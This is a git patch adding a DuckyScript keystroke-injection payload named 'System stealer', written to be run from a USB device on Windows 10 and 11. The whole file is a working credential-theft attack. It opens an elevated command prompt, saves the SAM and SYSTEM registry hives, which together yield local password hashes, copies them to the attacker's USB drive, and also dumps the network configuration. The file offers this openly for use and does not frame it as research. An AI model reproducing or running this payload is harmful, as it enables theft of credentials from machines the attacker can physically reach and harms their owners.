From 04dffb10d66611678c6f4bec6264403e6ac443bd Mon Sep 17 00:00:00 2001 From: youssef1621111 <142532442+youssef1621111@users.noreply.github.com> Date: Thu, 4 Jan 2024 22:45:27 +0200 Subject: [PATCH] Create System stealer.txt Steal Sam and system files --- System stealer.txt | 165 +++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 165 insertions(+) create mode 100644 System stealer.txt diff --git a/System stealer.txt b/System stealer.txt new file mode 100644 index 0000000..d7a6939 --- /dev/null +++ b/System stealer.txt @@ -0,0 +1,165 @@ +REM Title: system stealear +REM Author: youssef mohamed fathy +REM Description: steal windows sam and system files +REM Target: WINDOWS 10,11 +REM Requirements: usb flash drive + +DELAY 2000 + +CONTROL-ESC + +DELAY 200 + +UPARROW + +DELAY 200 + +UPARROW + +DELAY 200 + +UPARROW + +DELAY 200 + +UPARROW + +DELAY 200 + +PAGEUP + +CTRL-SHIFT + +DELAY 2000 + +ENTER + +DELAY 3000 + +LEFTARROW + +DELAY 3000 + +ENTER + +STRING reg save HKLM\sam ./sam.save +ENTER +STRING reg save HKLM\system ./system.save + +ENTER + +DELAY 2000 + +STRING explorer . + +ENTER + +DELAY 3000 + +CTRL-F + +DELAY 2000 + +STRING sam.save + +ENTER + +DELAY 1000 + +DOWNARROW + +CTRL-C + +DELAY 2000 + +REM you can replace ctrl-alt-z with your usb flash drive shortcut + +CTRL-ALT-Z + +DELAY 1000 + +CTRL-V + +DELAY 2000 + +WINDOWS-S + +STRING cmd + +ENTER + +DELAY 2000 + +STRING explorer . + +DELAY 2000 + +CTRL-F + +DELAY 2000 + +STRING system.save + +ENTER + +DELAY 2000 + +DOWNARROW + +DELAY 1000 + +CTRL-C + +DELAY 2000 + +CTRL-ALT-Z + +DELAY 3000 + +CTRL-V + +ALT-F4 + +REM steal ip configuration + +WINDOWS-r + +STRING cmd + +ENTER + +DELAY 2000 + +REM replace usb drive with your usb name + +STRING cd userprofile/(usb drive) + +ENTER + +DELAY 5000 + +STRING ipconfig /all + +ENTER + +DELAY 6000 + +STRING ipconfig /all > Data.txt + +ENTER + +DELAY 1000 + +ALT-f4 + + + + + + + + + + + +